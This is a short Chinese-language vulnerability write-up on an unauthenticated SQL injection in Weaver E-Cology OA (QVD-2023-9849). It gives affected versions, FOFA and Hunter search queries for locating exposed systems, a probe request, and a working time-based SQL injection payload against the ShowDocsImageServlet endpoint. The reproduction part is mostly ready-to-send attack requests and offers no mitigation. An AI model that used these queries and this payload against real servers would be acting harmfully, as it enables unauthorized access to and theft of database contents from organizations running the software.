泛微E-Cology CheckServer.jsp路径SQL注入漏洞(QVD-2023-9849)

漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当，导致存在 SQL 注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

影响版本

泛微 Ecology 9.x <= v10.56；泛微 Ecology 8.x <= v10.56

漏洞复现

fofa查询语法：app="泛微-协同办公OA"
鹰图查询语法：app.name="泛微 e-cology 9.0 OA"
登录页面如下：

POC:

GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1
Host: ***
Connection: close

访问/mobile/plugin/CheckServer.jsp?type=mobileSetting ，返回状态码200且参数值为{“error”;”system error”}
Payload：

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close